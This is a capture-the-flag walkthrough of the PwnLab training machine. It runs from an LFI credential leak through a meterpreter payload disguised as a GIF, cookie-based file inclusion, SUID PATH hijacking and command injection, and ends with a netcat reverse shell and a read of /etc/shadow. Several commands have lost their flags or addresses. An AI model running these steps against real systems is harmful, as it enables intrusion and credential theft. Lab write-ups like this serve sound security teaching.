CTF Walkthroughs: Pwnlab: Host Discovery
CTF Walkthroughs: Pwnlab: Host Discovery
CTF Walkthroughs: Pwnlab: Host Discovery
Walkthroughs: PwnLab
Host Discovery
root@kali2vm:/# netdiscover r
Target:; notice that the MAC address prefix identifies the system as a Virtual
Service Enumeration
The pentester deployed several scans to identify and enumerate network services:
root@kali2vm:/# nmap Pn n p
root@kali2vm:/# nmap Pn n sU topports 20 open reason
root@kali2vm:/# nmap Pn n A p 80,111,3306
None of the applications appeared to be vulnerable to remote access exploits. The pentester
shifted focus to enumerating the web server.
Manual Browsing
Three web pages were found (listed below). The pentester examined the source code of each,
and also probed for common vulnerabilities such as SQL injection, weak passwords, and
remote and local file inclusion. No significant results were found.
The pentester deployed Nikto to scan for web application vulnerabilities.
root@kali2vm:/# nikto h
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /login.php: Admin login page/section found.
The pentester noted that the config.php page may contain usernames and passwords, and that
a login.php page is present. The pentester navigated to /config.php, but the page appeared to
be blank. The pentester then began probing login.php, but no significant progress was made.
At this point, the pentester spent significant time launching password attacks and enumerating
the MySQL instance; however, all activities resulted in no significant results. The pentester
rationalized that there was another vector, likely a local file inclusion affecting the “
After several hours devoted to research, the pentester came across a promising article posted
The article describes a technique for performing local file inclusion using the
“php://filter/convert.base64_encode/resource” function.
The pentester took this information and crafted the following request:
root@kali2vm:/# curl
Notice that the pentester requested the config.php file that previously returned no data. In this
case, the config.php file was returned to the pentester in base 64 encoded format.
config.php in base64:
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
The pentester identifies root credentials to the MySQL database. The pentester then connected
to the database for further enumeration.
root@kali2vm:/# mysql h u root p Users
The pentester began examining the SQL database for any useful information. The pentester
found some usernames and base64 encoded passwords.
Decoded, the passwords are:
kent: JWzXuBJJNy
mike: SIfdsTEn6I
kane: iSv5Ym2GRo
The pentester uses these credentials to login to the web server. The pentester now has the
option to upload files to the web server.
Initially, the pentester tried uploading various PHP shells, but the web server responded that
only image files were accepted. The pentester then created a php meterpreter script and
injected it into a GIF. To create this payload, perform the following steps:
1. echo GIF98 > evil.gif
2. msfvenom p php/meterpreter_reverse_tcp LHOST= LPORT=8080 >>
The pentester then successfully uploaded this payload; this can be confirmed by navigating to:
Notice that the filename appears to be an MD5 hash: 1b7d2e8797d863fdf63594e390c18255
While the pentester could upload malicious code to the target, he still needed a way to execute
the payload. The pentester assessed that he may be able to use local file inclusion to execute
the code. After a period with no measurable progress, the pentester decided to review the
contents of index.php using the previously discovered LFI vulnerability.
root@kali2vm:/# curl
Again, this returned the source code of index.php in base64 format. The pentester decoded it,
and examined the source code. One code snippet stood out:
if (isset($_COOKIE['lang']))
The pentester assessed that a LFI vulnerability may be present in the cookie field. To test this
theory, the pentester enabled the Firefox addon, “TamperData”, which intercepts and modifies
HTTP requests. The pentester navigated to in his browser with
TamperData enabled, and modified the HTTP request as follows:
The pentester then received a dump of the /etc/passwd file.
Nice! The pentester had all he needed to receive a remote shell. The pentester entered
metasploit and configured a multi handler to catch the reverse shell.
root@kali2vm:/# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 8080
msf exploit(handler) > exploit
With the multihandler listening for a reverse shell, the pentester navigated to in his browser with TamperData enabled, and modified the HTTP request
once again as follows:
Cookie: lang=../upload/1b7d2e8797d863fdf63594e390c18255.gif
The pentester successfully received a reverse meterpreter shell. The pentester then began post
access enumeration.
First, the pentester spawned a tty terminal to improve the functionality of his shell:
python c 'import pty; pty.spawn("/bin/sh")'
Next, the pentester examined the kernel version:
$ uname a
Linux pwnlab 3.16.04686pae #1 SMP Debian 3.16.7ckt201+deb8u4 (20160229) i686
The pentester tried several kernel exploits, all of which failed. It couldn’t have been that easy!
The pentester switches users to Kane using the previously acquired MySQL credentials.
The pentester observes a unique file in Kane’s home directory: msgmike
It appears msgmike has the SUID bit set, implying that we may be able to manipulate the binary
to execute commands under user Mike. When the pentester ran msgmike, he received a distinct
cat: /home/mike/msg.txt: No such file or directory
It appears that this file is simply running the cat command. After some research, the pentester
found that this command can be exploited by affecting the order in which the OS searches paths
to find and execute a binary. The pentester first examined the existing path:
kane@pwnlab:~$ echo $PATH
echo $PATH
The pentester then modified the path to point to a directory of the pentester’s choosing:
kane@pwnlab:~$ export PATH=.
kane@pwnlab:~$ echo $PATH
kane@pwnlab:~$ .
The pentester assessed that if he made a file called “cat” in the /tmp directory, it would be
executed under the context of Mike when executed through the msgmike command. The
pentester created a shell script called cat, which will function as the payload in this case.
kane@pwnlab:~$ echo “/bin/sh” > cat
kane@pwnlab:~$ /bin/chmod 755 cat
kane@pwnlab:~$ ./msgmike
The pentester then had a shell under privileges of Mike. The pentester then restored the path to
its original state.
$ export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
Next, the pentester noticed a file called msg2root in Mike’s home folder.
This is another SUID file. The pentester ran it, and observed that it simply takes user input and
echos it back to standard out. The pentester assessed that he may be able to pass it arbitrary
commands via command injection. The pentester tried the following:
$ /home/mike/msg2root
Message for root: Command Injection Test; /bin/cat /etc/shadow
Sure enough, it worked! At this point, it was trivial for the pentester to receive a root shell. The
pentester constructed a netcat listener, then shoveled a shell using the command injection
nc nlvp 8000
$ /home/mike/msg2root
Message for root: hacked; /bin/nc nv 8000 e /bin/sh
The pentester concluded the challenge by dumping the flag:
This was an excellent challenge. It required pentesters to think outside the box, correlate
findings, and manually validate vulnerabilities. This was a good example of the importance of
manual methods, as no automated vulnerability scanner would have disclosed the flaws found
during this engagement. This challenge also demonstrates the importance of validating user
input. The pentester made liberal use of malicious code via multiple local file inclusion
vulnerabilities, path tampering, and command injection. Everything must be validated and
sanitized for proper input, even when you think there is no way a hacker could inject malicious
code into a program. Additionally, this challenge demonstrated that sensitive data should not
rely on base64 encoding as its sole form of protection. Had the MySQL passwords been
encrypted with a strong password, the pentester would likely have failed to gain access through
the methods outlined above.
Thanks to Claor for the outstanding challenge!